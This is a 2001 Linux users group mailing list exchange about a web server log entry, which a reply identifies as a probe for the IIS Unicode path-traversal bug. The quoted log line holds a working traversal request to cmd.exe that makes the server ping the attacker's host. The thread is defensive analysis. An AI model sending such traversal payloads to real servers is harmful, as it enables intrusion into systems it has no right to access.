[lug] Interesting Access Message
George Sexton
gsexton at mhsoftware.com
Tue Jul 31 11:19:18 MDT 2001
They are attempting to use the Unicode parsing bug in IIS to force a ping to
themselves.
It appears the goal is to try to find out if the machine has the Unicode
parsing bug.
ping -n 1 -l 64 -w 1 24.41.72.83
The host resolves out to:
CBL083.pool006.CH001-west-covina.dhcp.hs.earthlink.net
Here are the options for NT Ping.
Options:
-t Ping the specifed host until interrupted.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
-----Original Message-----
From: lug-admin at lug.boulder.co.us [mailto:lug-admin at lug.boulder.co.us]On
Behalf Of Greg Horne
Sent: 31 July, 2001 10:59 AM
To: lug at lug.boulder.co.us
Subject: [lug] Interesting Access Message
I was going through my server logs (apache on linux) and I noticed this
error message:
24.41.72.83 - - [31/Jull/2001:08:05:39 -0700] "GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-n+1+-l+64+-w+1+24.41.
72.83
HTTP/1.0" 404 -
Has anybody ever seen anything like this???
Greg
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
_______________________________________________
Web Page: http://lug.boulder.co.us
Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug
More information about the LUG
mailing list